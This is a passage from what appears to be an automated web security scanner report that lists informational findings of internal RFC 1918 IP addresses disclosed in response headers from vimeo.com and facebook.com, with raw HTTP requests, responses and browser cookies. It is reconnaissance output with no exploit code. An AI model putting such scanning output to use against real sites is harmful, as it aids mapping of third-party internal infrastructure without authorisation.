Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 588
Content-Type: image/png
Last-Modified: Mon, 04 Jul 2011 01:52:16 GMT
X-FB-Server: 10.138.17.182
Cache-Control: public, max-age=30200000
Expires: Tue, 03 Jul 2012 03:51:02 GMT
Date: Tue, 19 Jul 2011 14:57:42 GMT
Connection: close

.PNG
.
...IHDR...!...F.....u......PLTE......CW.......^uq.....................U.......T\lx..l}...........N....0D..........q.................{.......................v......%....................;....
...[SNIP]...

24.170. http://vimeo.com/moogaloop.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vimeo.com
Path:	/moogaloop.swf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.90.128.53

Request

GET /moogaloop.swf?clip_id=9957660&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1 HTTP/1.1
Host: vimeo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://feeds.feedburner.com/netsparker

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:41:20 GMT
Server: Apache
X-Powered-By: PHP/5.3.6-6~dotdeb.0
Expires: Tue, 19 Jul 2011 03:41:20 GMT
X-Server: 10.90.128.53
Vary: Accept-Encoding
Content-Length: 291
Connection: close
Content-Type: application/x-shockwave-flash

FWS.#...p...........?........
.http%3A%2F%2Ffeeds.feedburner.com%2Fnetsparker.embed_location.moogaloop.moogaloop_type.player.vimeo.com.player_server.a.vimeocdn.com.cdn_server.http://a.vimeocdn.com/p/f
...[SNIP]...

24.171. http://vimeo.com/moogaloop.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vimeo.com
Path:	/moogaloop.swf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.90.128.67

Request

Response

24.172. http://vimeo.com/moogaloop.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vimeo.com
Path:	/moogaloop.swf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.90.128.74

Request

GET /moogaloop.swf?clip_id=10000593&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1 HTTP/1.1
Host: vimeo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://feeds.feedburner.com/netsparker

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:41:20 GMT
Server: Apache
X-Powered-By: PHP/5.3.6-6~dotdeb.0
Expires: Tue, 19 Jul 2011 03:41:20 GMT
X-Server: 10.90.128.74
Vary: Accept-Encoding
Content-Length: 291
Connection: close
Content-Type: application/x-shockwave-flash

FWS.#...p...........?........
.http%3A%2F%2Ffeeds.feedburner.com%2Fnetsparker.embed_location.moogaloop.moogaloop_type.player.vimeo.com.player_server.a.vimeocdn.com.cdn_server.http://a.vimeocdn.com/p/f
...[SNIP]...

24.173. http://vimeo.com/moogaloop.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vimeo.com
Path:	/moogaloop.swf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.90.128.68

Request

GET /moogaloop.swf?clip_id=9957631&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1 HTTP/1.1
Host: vimeo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://feeds.feedburner.com/netsparker

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:41:20 GMT
Server: Apache
X-Powered-By: PHP/5.3.6-6~dotdeb.0
Expires: Tue, 19 Jul 2011 03:41:20 GMT
X-Server: 10.90.128.68
Vary: Accept-Encoding
Content-Length: 291
Connection: close
Content-Type: application/x-shockwave-flash

FWS.#...p...........?........
.http%3A%2F%2Ffeeds.feedburner.com%2Fnetsparker.embed_location.moogaloop.moogaloop_type.player.vimeo.com.player_server.a.vimeocdn.com.cdn_server.http://a.vimeocdn.com/p/f
...[SNIP]...

24.174. http://www.facebook.com/advertising/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/advertising/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.88.37

Request

Response

24.175. http://www.facebook.com/ajax/connect/connect_widget.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/connect/connect_widget.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.242.37

Request

GET /ajax/connect/connect_widget.php?__a=1&id=115365331864877&uniqid=stream_loading_indicator&force_wall=false HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2276bd5f4%26origin%3Dhttp%253A%252F%252Fwww.fastteks.com%252Ff845f085c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=427&href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFast-teks-of-Central-Southern-Rhode-Island%2F115365331864877%3Fv%3Dapp_4949752878%26ref%3Dsgm&locale=en_US&sdk=joey&show_faces=false&stream=true&width=500
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Frame-Options: DENY
X-FB-Server: 10.54.242.37
X-Cnection: close
Date: Tue, 19 Jul 2011 16:05:37 GMT
Content-Length: 17141

for (;;);{"__ar":1,"payload":null,"css":["VYhgt","CDBlN","cMRaR"],"js":["j4mSW"],"onload":["DOM.replace(DOM.find(document.documentElement, \"#stream_loading_indicator\"), HTML(\"\\u003cdiv>\\u003cul c
...[SNIP]...

24.176. http://www.facebook.com/ajax/connect/connect_widget.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/connect/connect_widget.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.21.57

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Frame-Options: DENY
X-FB-Server: 10.55.21.57
X-Cnection: close
Date: Tue, 19 Jul 2011 16:04:38 GMT
Content-Length: 17141

for (;;);{"__ar":1,"payload":null,"css":["VYhgt","CDBlN","cMRaR"],"js":["j4mSW"],"onload":["DOM.replace(DOM.find(document.documentElement, \"#stream_loading_indicator\"), HTML(\"\\u003cdiv>\\u003cul c
...[SNIP]...

24.177. http://www.facebook.com/ajax/intl/language_dialog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/intl/language_dialog.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.111.31

Request

Response

24.178. http://www.facebook.com/ajax/prefetch.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/prefetch.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.99.40

Request

Response

24.179. http://www.facebook.com/ajax/prefetch.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/prefetch.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.99.45

Request

Response

24.180. http://www.facebook.com/badges previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/badges

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.120.33

Request

Response

24.181. http://www.facebook.com/badges/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/badges/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.92.64

Request

Response

24.182. http://www.facebook.com/campaign/landing.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/campaign/landing.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.84.54

Request

GET /campaign/landing.php?campaign_id=137675572948107&partner_id=bing.com&placement=like_button&extra_1=http%3A%2F%2Fwww.bing.com%2F&extra_2=US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?&show_faces=true&action=like&font=arial&layout=standard&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110719_0700%26ssh%3DS262080510%26FORM%3DHPFBLK%26mkt%3Den-US%26&width=400&height=80
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; _e_FxZX_6=%5B%22FxZX%22%2C1310603126425%2C%22act%22%2C1310603126424%2C7%2C%22cancel%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2FBranchOutApp%3Fsk%3Dapp_131479520210618%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C717%2C213%2C20%2C1008%2C16%5D

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/r.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; expires=Thu, 18-Aug-2011 14:58:23 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.84.54
X-Cnection: close
Date: Tue, 19 Jul 2011 14:58:23 GMT
Content-Length: 0

24.183. http://www.facebook.com/campaign/landing.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/campaign/landing.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.102.30

Request

Response

24.184. http://www.facebook.com/captcha/tfbimage.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/captcha/tfbimage.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.113.53

Request

GET /captcha/tfbimage.php?captcha_challenge_code=1311087433-f620f5659a8b44291ab316de6ed0d539&captcha_challenge_hash=AZkWniGRARLLI7KGb2Ftw8Kan6cPLcrdoIEg55_qKpS6bNqdYI6ySF6jy4rL44AzR14MD7xTDKmNJx0tj6A9TkWVfZn-xaZu_Q2MXgffN6BIrXYn7okHWiX1Jiz4eCGKboU_F5BrS3zKXCZhPeWwHjXlH0ws5-HDYH9UFWW9uF3Lygain7xK5QJlaDc42i3RoN_BT_spad3xdW9anfkmxxILmxsdW5ePttUs80ZoTCpC7LTq1G04h5J59yaZM4l2roXZxFlQB-f9MwwNfZNFFxSpV00yvmRZO9V_V6KEN6v2yoNZ5X95geU9kGN8u9RvqZlgM48Z1G1zfqxdDd4u7qerBHmyZWEUwWAs2KtWumivNfRVH9OlvYz5lXq3VCjHrYtV0SzgUdFB-_5353NQ2Qyf9s1dg6_V-dWBH7A40W7FGZwEqArTOORdr-Db3edKlqGIONJoHwzSD52sL23juV2ora8Hj4qe4wZoKNgfAPJ0nvQDHtYMXTKVaetuO73eeRI_r1RWYeAEllKNvjpxvPqeGKaIb9itsKV1EDkbPBSMgBW8A95y8gSB8K-oKKi_FOVqnxzmn1BQ2YgehemaXFqB HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/login.php?next=http%3A%2F%2Fwww.facebook.com%2Fcaptcha%2Ftfbimage.php%3Fcaptcha_challenge_code%3D1311087433-f620f5659a8b44291ab316de6ed0d539%26captcha_challenge_hash%3DAZkWniGRARLLI7KGb2Ftw8Kan6cPLcrdoIEg55_qKpS6bNqdYI6ySF6jy4rL44AzR14MD7xTDKmNJx0tj6A9TkWVfZn-xaZu_Q2MXgffN6BIrXYn7okHWiX1Jiz4eCGKboU_F5BrS3zKXCZhPeWwHjXlH0ws5-HDYH9UFWW9uF3Lygain7xK5QJlaDc42i3RoN_BT_spad3xdW9anfkmxxILmxsdW5ePttUs80ZoTCpC7LTq1G04h5J59yaZM4l2roXZxFlQB-f9MwwNfZNFFxSpV00yvmRZO9V_V6KEN6v2yoNZ5X95geU9kGN8u9RvqZlgM48Z1G1zfqxdDd4u7qerBHmyZWEUwWAs2KtWumivNfRVH9OlvYz5lXq3VCjHrYtV0SzgUdFB-_5353NQ2Qyf9s1dg6_V-dWBH7A40W7FGZwEqArTOORdr-Db3edKlqGIONJoHwzSD52sL23juV2ora8Hj4qe4wZoKNgfAPJ0nvQDHtYMXTKVaetuO73eeRI_r1RWYeAEllKNvjpxvPqeGKaIb9itsKV1EDkbPBSMgBW8A95y8gSB8K-oKKi_FOVqnxzmn1BQ2YgehemaXFqB
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.113.53
X-Cnection: close
Date: Tue, 19 Jul 2011 14:58:23 GMT
Content-Length: 0

24.185. http://www.facebook.com/careers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/careers/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.121.46

Request

Response

24.186. http://www.facebook.com/directory/pages/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/directory/pages/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.102.50

Request

Response

24.187. http://www.facebook.com/directory/people/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/directory/people/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.82.36

Request

Response

24.188. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.92.57

Request

GET /extern/login_status.php?api_key=113869198637480&app_id=113869198637480&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df11a0622e8%26origin%3Dhttp%253A%252F%252Fdevelopers.facebook.com%252Ff25fdb50e%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2d8882464%26origin%3Dhttp%253A%252F%252Fdevelopers.facebook.com%252Ff25fdb50e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb840448%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfe926613%26origin%3Dhttp%253A%252F%252Fdevelopers.facebook.com%252Ff25fdb50e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb840448&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df47b73648%26origin%3Dhttp%253A%252F%252Fdevelopers.facebook.com%252Ff25fdb50e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb840448&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df32c5a332%26origin%3Dhttp%253A%252F%252Fdevelopers.facebook.com%252Ff25fdb50e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb840448&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://developers.facebook.com/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf; __utma=87286159.39218672.1311087479.1311087479.1311087479.1; __utmb=87286159.1.10.1311087479; __utmc=87286159; __utmz=87286159.1311087479.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wd=1065x723

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.92.57
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:55 GMT
Content-Length: 254

<script type="text/javascript">
parent.postMessage("cb=f47b73648&origin=http\u00253A\u00252F\u00252Fdevelopers.facebook.com\u00252Ff25fdb50e&relation=parent&transport=postmessage&frame=fb840448", "htt
...[SNIP]...

24.189. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.137.31

Request

GET /extern/login_status.php?api_key=140669015975185&app_id=140669015975185&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2ac4379ac%26origin%3Dhttp%253A%252F%252Fwww.ticketmaster.com%252Ffc54d770c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3aadaff6%26origin%3Dhttp%253A%252F%252Fwww.ticketmaster.com%252Ffc54d770c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1df0ea0e8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3ab3bb878%26origin%3Dhttp%253A%252F%252Fwww.ticketmaster.com%252Ffc54d770c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1df0ea0e8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1c832e914%26origin%3Dhttp%253A%252F%252Fwww.ticketmaster.com%252Ffc54d770c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1df0ea0e8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2d83e624%26origin%3Dhttp%253A%252F%252Fwww.ticketmaster.com%252Ffc54d770c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1df0ea0e8&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.137.31
X-Cnection: close
Date: Tue, 19 Jul 2011 18:36:05 GMT
Content-Length: 251

<script type="text/javascript">
parent.postMessage("cb=f1c832e914&origin=http\u00253A\u00252F\u00252Fwww.ticketmaster.com\u00252Ffc54d770c&relation=parent&transport=postmessage&frame=f1df0ea0e8", "htt
...[SNIP]...

24.190. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.0.51

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_06_0_993063&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_06_0_993063&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.0.51
X-Cnection: close
Date: Tue, 19 Jul 2011 15:15:34 GMT
Content-Length: 0

24.191. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.27.46

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_998904%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_998904%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_998904%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_06_0_998904&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_06_0_998904&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.27.46
X-Cnection: close
Date: Tue, 19 Jul 2011 23:39:20 GMT
Content-Length: 0

24.192. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.137.33

Request

GET /extern/login_status.php?api_key=105579996199059&app_id=105579996199059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3b6b61bb%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff661fbb9c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df26485fa0%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff661fbb9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df39002db7%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2499a3fe%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff661fbb9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df39002db7&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3b1ce1fd%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff661fbb9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df39002db7&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3f7015e6%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff661fbb9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df39002db7&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.137.33
X-Cnection: close
Date: Tue, 19 Jul 2011 18:35:24 GMT
Content-Length: 241

<script type="text/javascript">
